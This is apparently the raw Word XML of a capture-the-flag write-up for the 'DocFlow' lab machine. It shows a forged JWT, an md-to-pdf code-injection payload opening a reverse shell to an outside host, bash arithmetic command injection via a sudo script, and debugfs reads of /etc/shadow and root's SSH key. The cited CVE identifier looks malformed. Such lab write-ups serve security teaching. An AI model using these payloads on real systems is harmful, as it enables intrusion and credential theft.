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360" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.roa6wfjnhhmq" w:id="0"/>
      <w:bookmarkEnd w:id="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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.p9fi6dfurdi0" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">DocFlow</w:t>
        </w:r>
      </w:hyperlink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 machine. If you need support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server.</w:t>
        </w:r>
      </w:hyperlink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07">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.2gsi7a5siyw0" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance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We began the application enumeration process using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Nmap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to identify active hosts, open ports, and exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="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nmap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-Pn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-p-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--open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--min-rate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1200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&lt;machine-ip&gt;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-sVC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-vvv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2451100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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11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During the scan, we identified that the application has two exposed ports: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port 80 (HTTP)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port 22 (SSH)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 When accessing the application through port 80 (HTTP), it was possible to analyze the web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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3003788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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3788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Using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ffuf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to perform directory and file brute forcing, we identified the presence of the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package.json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file within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="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ffuf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-u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http://&lt;machine-ip&gt;/FUZZ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common.txt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100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-fl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2775188"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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5188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The contents of the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package.json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file revealed the versions of the libraries installed on the server, allowing assessment of potential vulnerabilities associated with the dependencies in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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734050" cy="4700000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="77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7000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It was identified that the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md-to-pdf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library used by the application contains an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Arbitrary Code Injection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vulnerability affecting versions prior to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5.2.5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as described in</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> CVE-2025-065108.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However, when interacting with the application, it was verified that the functionality associated with this library is not accessible through the interface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currently available to the user.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We created a user account and password in the web application to continue analyzing the page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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3139424"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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9424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Upon accessing the application, it was observed that use of this functionality is restricted to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premium accounts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and is not available to standard users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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2870819"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="79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0819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When the user was created, a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JWT token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was also generated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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003300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="78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033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By inspecting the application using the browser developer tools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(F12)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specifically under the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Debugger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tab, it was identified that the application uses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Webpack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in its build process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A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Considering that the application uses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Webpack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and that the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sourceMap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option is enabled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it became possible to access and view all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front-end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files of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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854200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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42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701800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="80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18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With this option enabled, it was possible both to identify the routes used by the application and to obtain the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JWT signing token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exposed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within the front-end files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="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token-jwt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eva6C7G4LTdY!p@yMMxb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879600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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96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With the JWT signing key in hand, it was possible to modify the token attributes, changing the user permission from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is_premium: false para true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 To generate the modified JWT token, we used the tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">jwt.io.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3451463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="82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1463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In this way, it was possible to access the application’s premium account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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2538587"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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8587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Additionally, by exploiting the previously identified vulnerability in the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md-to-pdf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library, it was possible to demonstrate arbitrary command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto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---js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((require("child_process")).execSync("/bin/bash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'sh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&gt;&amp;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/dev/tcp/&lt;ip-vpn&gt;/443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0&gt;&amp;1'"))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4108307"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="85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08307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40" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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We opened a listener on port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443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to wait for the reverse shell and, after the connection was established, obtained access as user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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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625600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="86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56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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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Next, we obtained an interactive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TTY shell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to improve session stability and usability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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script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/dev/null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ctr+z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raw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-echo;fg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762625" cy="2143125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="87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143125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Using the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sudo -l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command, we verified that the user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www-data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has permission to execute the file located at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/opt/check.sh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as user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axel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without requiring a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056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sudo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422400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="88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24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It was identified that the script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check.sh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reads a user-supplied value and stores it in the variable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num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.This variable is then used directly in a conditional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(if)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statement without any prior validation or sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C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The lack of proper input handling allows unexpected values to be inserted into the variable, enabling arbitrary command interpretation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D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438775" cy="2657475"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="89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38775" cy="2657475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In this way, we were able to inject commands, as confirmed by the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output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of the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whoami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command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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a[$(whoami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&gt;&amp;2)]+42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8363" cy="1239242"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="90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8363" cy="1239242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With this, we simply needed to invoke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bash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to execute commands as user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axel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67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a[$(bash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&gt;&amp;2)]+42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181100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="91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11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The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user flag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is located in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/home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of the user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axel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6E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889000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="93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90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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hfzuy7z5c35m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1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.by2ys9argo18" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag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By executing the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id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command, we identified that the user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axel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belongs to the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disk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group, which allows reading and writing files on the system with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073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876300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="67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763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Using the lsblk command, we identified that the system is mounted on the partition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nvme0n1p1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77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lsblk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698863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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98863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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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Using the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debugfs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tool, which allows low-level interaction with file systems, we were able to read the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/etc/shadow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file by accessing the previously identified partition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(nvme0n1p1).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E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debugfs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/dev/nvme0n1p1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5032613"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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33"/>
                    <a:srcRect b="581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32613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We were able to access the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root user’s id_rsa key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86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4489688"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="70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89688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With the root user’s private key, it was possible to obtain access to the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root account via SSH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8A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ssh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root@&lt;machine-ip&gt;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4413488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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13488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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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The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root flag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is located in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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091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244600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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46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sectPr>
      <w:headerReference r:id="rId37" w:type="default"/>
      <w:headerReference r:id="rId38" w:type="first"/>
      <w:headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold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C">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club |All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f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E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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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97">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3wyqxkhzvp1m" w:id="5"/>
    <w:bookmarkEnd w:id="5"/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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="92" name="image24.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221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98"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120" w:before="360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32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99">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image19.png"/>
        </v:shape>
      </w:pic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A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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="94" name="image28.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image28.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729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mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="66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2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651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120" w:before="480" w:line="275.9999942779541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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - DocFlow</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr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45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-344480</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5771833</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3015679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="66" name="image30.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image30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686550" cy="3015679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B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spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image19.pn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footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jwt.io" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29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image" Target="media/image23.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/303#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId33" 